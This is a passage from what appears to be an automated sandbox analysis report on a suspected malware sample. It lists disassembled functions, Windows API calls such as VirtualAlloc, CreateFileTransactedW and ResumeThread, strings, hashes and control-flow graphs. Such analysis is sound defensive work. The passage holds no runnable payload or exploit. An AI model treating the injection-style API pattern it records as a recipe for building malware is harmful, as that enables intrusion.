                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: }
                                                                                                                                                                          • API String ID: 176396367-4239843852
                                                                                                                                                                          • Opcode ID: adcbf74177d16d64d60bb897ff9a2a26b858112ba3e608d6edae8ba47dc9c606
                                                                                                                                                                          • Instruction ID: 77e7ee0ab0cb94eda831a0492a3011a0f66d65c1a109f7f036f3181839f04540
                                                                                                                                                                          • Opcode Fuzzy Hash: adcbf74177d16d64d60bb897ff9a2a26b858112ba3e608d6edae8ba47dc9c606
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A2135329053065ADB30EA64D851F6FB3DCDFA0710F2504AAF780C3245EB64DE4893B2
                                                                                                                                                                          Function 00B2F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B2F2E4
                                                                                                                                                                            • Part of subcall function 00B2F2C5: GetProcAddress.KERNEL32(00B681C8,CryptUnprotectMemory), ref: 00B2F2F4
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00B2F33E), ref: 00B2F3D2
                                                                                                                                                                          Strings
                                                                                                                                                                          • CryptProtectMemory failed, xrefs: 00B2F389
                                                                                                                                                                          • CryptUnprotectMemory failed, xrefs: 00B2F3CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                          • API String ID: 2190909847-396321323
                                                                                                                                                                          • Opcode ID: 5ab7e146112e687457e063e073ca6d502d765f317bbd0f0230a5a5277b8572f1
                                                                                                                                                                          • Instruction ID: ec4114e4117f997937a558c040c6d18541c67a17dd17b1e379e28338a3e711ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab7e146112e687457e063e073ca6d502d765f317bbd0f0230a5a5277b8572f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 2711E43260163AABDF11AB20E84167E37E5FF05B60B0442F5FC096B391DE749D018A99
                                                                                                                                                                          Function 00B2B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B2B9B8
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID: %c:\
                                                                                                                                                                          • API String ID: 1543624204-3142399695
                                                                                                                                                                          • Opcode ID: 546d45b6c931d9e6a8e313d20f34818e0f42f6aa000336197b18058445d762f9
                                                                                                                                                                          • Instruction ID: 9e51fbd1ed43e7781e3101d806198aca777c31b23ccfbefdac551abf546e336f
                                                                                                                                                                          • Opcode Fuzzy Hash: 546d45b6c931d9e6a8e313d20f34818e0f42f6aa000336197b18058445d762f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01456310032169DA306B75AC86D2BB3ECEE86770B40448AF548D6182FF20E94082B1
                                                                                                                                                                          Function 00B3101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00010000,00B31160,?,00000000,00000000), ref: 00B31043
                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00B3108A
                                                                                                                                                                            • Part of subcall function 00B26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B26C54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                          • String ID: CreateThread failed
                                                                                                                                                                          • API String ID: 2655393344-3849766595
                                                                                                                                                                          • Opcode ID: 1a1089240d488fef4408607416c6a19ff7a7013fa1be822e282051ab7797ffc6
                                                                                                                                                                          • Instruction ID: 288d54aec3c9505757fc4843d242cca094b164a397cd01ba0878527fe0d3d5ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a1089240d488fef4408607416c6a19ff7a7013fa1be822e282051ab7797ffc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01F9B63443096FD7346F6CAC51B76B3DCEB40751F3408EEFA86922D0CEA168858624
                                                                                                                                                                          Function 00B21316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2E2E8: _swprintf.LIBCMT ref: 00B2E30E
                                                                                                                                                                            • Part of subcall function 00B2E2E8: _strlen.LIBCMT ref: 00B2E32F
                                                                                                                                                                            • Part of subcall function 00B2E2E8: SetDlgItemTextW.USER32(?,00B5E274,?), ref: 00B2E38F
                                                                                                                                                                            • Part of subcall function 00B2E2E8: GetWindowRect.USER32(?,?), ref: 00B2E3C9
                                                                                                                                                                            • Part of subcall function 00B2E2E8: GetClientRect.USER32(?,?), ref: 00B2E3D5
                                                                                                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 2622349952-4108050209
                                                                                                                                                                          • Opcode ID: 99dbc748ed0ce2ce2ad3e4ba75fbcd73ace5b85fe3063afc91576b9788c27b19
                                                                                                                                                                          • Instruction ID: 5ac5b55c8b3ac551d80eb67dad1659370649a920602e2d91356c1943f2f3b9d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 99dbc748ed0ce2ce2ad3e4ba75fbcd73ace5b85fe3063afc91576b9788c27b19
                                                                                                                                                                          • Instruction Fuzzy Hash: 42F081311042A8B6DF155F58E80D7A93BDBEB20B44F094D94FC49515A1DB78C990DB14
                                                                                                                                                                          Function 00B30FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00B31206,?), ref: 00B30FEA
                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00B30FF6
                                                                                                                                                                            • Part of subcall function 00B26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B26C54
                                                                                                                                                                          Strings
                                                                                                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B30FFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                          • API String ID: 1091760877-2248577382
                                                                                                                                                                          • Opcode ID: ca7adca6f9327e6ff1ffc7572bd4ef05365010da9332f91dc3f8d7c66ec270c1
                                                                                                                                                                          • Instruction ID: 19a65e696fd75d68e664136a38d4da008e8e98cd3bab6b0b9a1742f597968fb4
                                                                                                                                                                          • Opcode Fuzzy Hash: ca7adca6f9327e6ff1ffc7572bd4ef05365010da9332f91dc3f8d7c66ec270c1
                                                                                                                                                                          • Instruction Fuzzy Hash: D9D05B7250C73076C61137286C06F6F3984DB11772F640BD4F53D553F5CF1549915696
                                                                                                                                                                          Function 00B2E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00B2DA55,?), ref: 00B2E2A3
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B2DA55,?), ref: 00B2E2B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                                                          • String ID: RTL
                                                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                                                          • Opcode ID: cfbb8d927b45a0f91486c1ab6512984b2de0c587f454b7a1cff85eb530d71597
                                                                                                                                                                          • Instruction ID: daaeaced523b694cc3aba637bc3c0d69c1cc2d6213a2c39e67d9ef062519e5d1
                                                                                                                                                                          • Opcode Fuzzy Hash: cfbb8d927b45a0f91486c1ab6512984b2de0c587f454b7a1cff85eb530d71597
                                                                                                                                                                          • Instruction Fuzzy Hash: 62C0123124071066E67057757C0DB47AAD85B00F92F0904CCB545EA3D1DAA5C54486A0

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:13.5%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:34
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 19084 7ffd9b9ed04a 19085 7ffd9b9ed059 CreateFileTransactedW 19084->19085 19087 7ffd9b9ed268 19085->19087 19076 7ffd9b9ef0f5 19077 7ffd9b9ef161 VirtualAlloc 19076->19077 19079 7ffd9b9ef23f 19077->19079 19080 7ffd9b9ed2f5 19081 7ffd9b9ed36b WriteFile 19080->19081 19083 7ffd9b9ed48f 19081->19083 19064 7ffd9b9ee6e1 19067 7ffd9b9ee6eb 19064->19067 19065 7ffd9b9ee815 19071 7ffd9b9eec5a 19065->19071 19067->19065 19068 7ffd9b9ee822 19067->19068 19069 7ffd9b9eec5a GetSystemInfo 19068->19069 19070 7ffd9b9ee820 19069->19070 19072 7ffd9b9eec65 19071->19072 19073 7ffd9b9eec85 19072->19073 19074 7ffd9b9eed22 GetSystemInfo 19072->19074 19073->19070 19075 7ffd9b9eed85 19074->19075 19075->19070 19102 7ffd9b9eec91 19103 7ffd9b9eec9e GetSystemInfo 19102->19103 19105 7ffd9b9eed85 19103->19105 19088 7ffd9b9eb57d 19089 7ffd9ba515e0 19088->19089 19090 7ffd9ba51652 19089->19090 19093 7ffd9ba507d0 19089->19093 19092 7ffd9ba516c9 19094 7ffd9ba507db 19093->19094 19096 7ffd9ba5087e 19094->19096 19097 7ffd9ba50897 19094->19097 19096->19092 19098 7ffd9ba508ea ResumeThread 19097->19098 19099 7ffd9ba508a2 19097->19099 19101 7ffd9ba509b4 19098->19101 19099->19096 19101->19096

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9B9ED04A Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 969 7ffd9b9ed04a-7ffd9b9ed057 970 7ffd9b9ed059-7ffd9b9ed061 969->970 971 7ffd9b9ed062-7ffd9b9ed128 969->971 970->971 975 7ffd9b9ed12a-7ffd9b9ed141 971->975 976 7ffd9b9ed144-7ffd9b9ed266 CreateFileTransactedW 971->976 975->976 977 7ffd9b9ed268 976->977 978 7ffd9b9ed26e-7ffd9b9ed2f0 976->978 977->978
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFileTransacted
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2149338676-0
                                                                                                                                                                          • Opcode ID: 1fe1b163430988e76c17eddcaa73850ce89fcfbae91d2fa9f55b530b23534ab0
                                                                                                                                                                          • Instruction ID: a93547f964d5b6c31f3f76f44992dc31d939c5efb236d46bfb34da171d8d3c9d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1fe1b163430988e76c17eddcaa73850ce89fcfbae91d2fa9f55b530b23534ab0
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F912570909A5C8FDB99DF58C894BE9BBF1FB6A310F1041AED04DE3291DB75A984CB04
                                                                                                                                                                          Function 00007FFD9B9ED2F5 Relevance: 1.7, APIs: 1, Instructions: 215fileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 981 7ffd9b9ed2f5-7ffd9b9ed3c2 984 7ffd9b9ed3ea-7ffd9b9ed48d WriteFile 981->984 985 7ffd9b9ed3c4-7ffd9b9ed3e7 981->985 986 7ffd9b9ed495-7ffd9b9ed4f1 984->986 987 7ffd9b9ed48f 984->987 985->984 987->986
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          • Opcode ID: b1448ba6bc95f112586a8edf5174376e39a1e3e8266b26d39742e614c1cb58e0
                                                                                                                                                                          • Instruction ID: 2cb6a8071ca8fc6d99e21d1031bcc1a284a464726c23837d908efe1b5e850e42
                                                                                                                                                                          • Opcode Fuzzy Hash: b1448ba6bc95f112586a8edf5174376e39a1e3e8266b26d39742e614c1cb58e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 91611370A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3291DB75A985CB40
                                                                                                                                                                          Function 00007FFD9B9EEC5A Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 989 7ffd9b9eec5a-7ffd9b9eec63 990 7ffd9b9eec65-7ffd9b9eec83 989->990 991 7ffd9b9eecad 989->991 995 7ffd9b9eec85-7ffd9b9eec8f 990->995 996 7ffd9b9eec9e-7ffd9b9eecaa 990->996 992 7ffd9b9eecaf 991->992 993 7ffd9b9eecb0-7ffd9b9eed1a 991->993 992->993 998 7ffd9b9eed22-7ffd9b9eed83 GetSystemInfo 993->998 996->991 999 7ffd9b9eed8b-7ffd9b9eedbb 998->999 1000 7ffd9b9eed85 998->1000 1000->999
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                          • Opcode ID: 26d85c155d8b0ee6c18689a3675eb0532fda824409160abcfa500adaf662d335
                                                                                                                                                                          • Instruction ID: df7c693004fe00c07036e0beadf5e488f4e09b85dec0d0a7ab0925bba67b6590
                                                                                                                                                                          • Opcode Fuzzy Hash: 26d85c155d8b0ee6c18689a3675eb0532fda824409160abcfa500adaf662d335
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41D130A09A4C8FDB99EF98D855AF9BBF0EF55310F00416BD04DD72A2DA35A946CB40
                                                                                                                                                                          Function 00007FFD9BA50897 Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1003 7ffd9ba50897-7ffd9ba508a0 1004 7ffd9ba508a2-7ffd9ba508c2 1003->1004 1005 7ffd9ba508ea-7ffd9ba509b2 ResumeThread 1003->1005 1010 7ffd9ba509b4 1005->1010 1011 7ffd9ba509ba-7ffd9ba50a04 1005->1011 1010->1011
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                          • Opcode ID: e2f7ddcfdb659e51eea1ae81039626e21a0b75455e3214fc8bd8dda0e91950ec
                                                                                                                                                                          • Instruction ID: 2ca8a008228d2daaa66cfa8f6267ae86d2f4c18a0557a536cedc81100322980e
                                                                                                                                                                          • Opcode Fuzzy Hash: e2f7ddcfdb659e51eea1ae81039626e21a0b75455e3214fc8bd8dda0e91950ec
                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B70E0860C8FDBA8EF98D895AEDBBF0FB5A310F10416AD40DE7252DA71A945CB45
                                                                                                                                                                          Function 00007FFD9B9EEC91 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1014 7ffd9b9eec91-7ffd9b9eecad 1017 7ffd9b9eecaf 1014->1017 1018 7ffd9b9eecb0-7ffd9b9eed83 GetSystemInfo 1014->1018 1017->1018 1021 7ffd9b9eed8b-7ffd9b9eedbb 1018->1021 1022 7ffd9b9eed85 1018->1022 1022->1021
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                          • Opcode ID: 3212ebedc574eaadc2c8f4de7e0287484c609eb7d5cd583e121edc23fa27e5fe
                                                                                                                                                                          • Instruction ID: b81ee7123f8ac955939a4d5e382409c291f3ba40e5acfb7aa138453f77788316
                                                                                                                                                                          • Opcode Fuzzy Hash: 3212ebedc574eaadc2c8f4de7e0287484c609eb7d5cd583e121edc23fa27e5fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 43419F3090C68C8FDB99DFA8D899BE9BBF0EF56310F0441ABD04DD72A2CA755945CB11
                                                                                                                                                                          Function 00007FFD9B9EF0F5 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1423 7ffd9b9ef0f5-7ffd9b9ef23d VirtualAlloc 1426 7ffd9b9ef245-7ffd9b9ef2a9 1423->1426 1427 7ffd9b9ef23f 1423->1427 1427->1426
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: 586e4c49d1bfc353a489bf077a590f0bc67023dbabb721810e86290fa21ae1f0
                                                                                                                                                                          • Instruction ID: 3b25622196b98610deac92fd7d33879d39270ba3e2ad73d1d83174467cba9500
                                                                                                                                                                          • Opcode Fuzzy Hash: 586e4c49d1bfc353a489bf077a590f0bc67023dbabb721810e86290fa21ae1f0
                                                                                                                                                                          • Instruction Fuzzy Hash: AA512970918A4C8FDF58DF58C895BE9BBF0FB6A310F1042AAD04DE3251DB71A981CB41
                                                                                                                                                                          Function 00007FFD9BBB55E8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1430 7ffd9bbb55e8-7ffd9bbb5603 call 7ffd9bbb0c48 1433 7ffd9bbb5608-7ffd9bbb5633 1430->1433 1437 7ffd9bbb565c-7ffd9bbb5662 1433->1437 1438 7ffd9bbb5669-7ffd9bbb566f 1437->1438 1439 7ffd9bbb5635-7ffd9bbb564e 1438->1439 1440 7ffd9bbb5671-7ffd9bbb5676 1438->1440 1441 7ffd9bbb5745-7ffd9bbb5755 1439->1441 1442 7ffd9bbb5654-7ffd9bbb5659 1439->1442 1443 7ffd9bbb567c-7ffd9bbb56b1 call 7ffd9bbb0c48 1440->1443 1444 7ffd9bbb5563-7ffd9bbb55a8 1440->1444 1450 7ffd9bbb5757 1441->1450 1451 7ffd9bbb5758-7ffd9bbb57a6 1441->1451 1442->1437 1444->1438 1447 7ffd9bbb55ae-7ffd9bbb55b4 1444->1447 1452 7ffd9bbb5565-7ffd9bbb573d 1447->1452 1453 7ffd9bbb55b6 1447->1453 1450->1451 1464 7ffd9bbb57a7 1451->1464 1452->1441 1457 7ffd9bbb55df-7ffd9bbb55e6 1453->1457 1457->1430 1459 7ffd9bbb55b8-7ffd9bbb55d1 1457->1459 1459->1441 1461 7ffd9bbb55d7-7ffd9bbb55dc 1459->1461 1461->1457 1464->1464
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
